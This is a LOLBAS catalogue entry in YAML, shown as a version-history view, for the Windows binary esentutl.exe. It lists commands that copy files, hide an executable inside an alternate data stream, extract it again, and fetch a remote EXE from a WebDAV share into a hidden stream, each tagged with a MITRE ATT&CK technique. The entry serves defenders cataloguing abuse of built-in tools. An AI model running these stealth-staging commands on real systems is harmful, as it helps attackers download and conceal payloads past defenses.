LOLBAS/yml/OSBinaries/Esentutl.yml

59 lines
2.6 KiB
YAML
Raw Normal View History

2018-06-09 00:15:06 +02:00
---
Name: Esentutl.exe
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
Author: 'Oddvar Moe'
2018-06-09 00:15:06 +02:00
Created: '2018-05-25'
Commands:
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Description: Copies the source VBS file to the destination VBS file.
Usecase: Copies files from A to B
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
2018-06-09 00:15:06 +02:00
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
2018-06-09 00:15:06 +02:00
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
Usecase: Extract hidden file within alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
2018-06-09 00:15:06 +02:00
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Description: Copies the source EXE to the destination EXE file
Usecase: Use to copy files from one unc path to another
Category: Download
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe
Code_Sample:
- Code:
Detection:
- IOC:
2018-06-09 00:15:06 +02:00
Resources:
- Link: https://twitter.com/egre55/status/985994639202283520
Acknowledgement:
- Person: egre55
Handle: '@egre55'
---